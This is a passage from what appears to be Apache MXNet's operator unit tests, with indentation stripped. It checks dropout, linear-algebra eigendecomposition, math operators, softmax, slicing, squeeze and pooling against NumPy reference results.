grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@with_seed()
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
@with_seed()
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
def test_begin_equals_end(shape, begin, end, step):
in_arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
out_arr = mx.nd.slice(in_arr, begin=begin, end=end, step=step)
assertRaises(MXNetError, test_begin_equals_end, (4,), (2,), (2,), (1,))
assertRaises(MXNetError, test_begin_equals_end, (1, 5), (None, 3), (None, 3), (-1, 1))
assertRaises(MXNetError, test_begin_equals_end, (3, 4, 5), (1, 3, 1), (3, 3, 1), (1, -3, 2))
assertRaises(MXNetError, test_begin_equals_end, (2, 4), (None, 2), (None, 2), (1, -1))
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
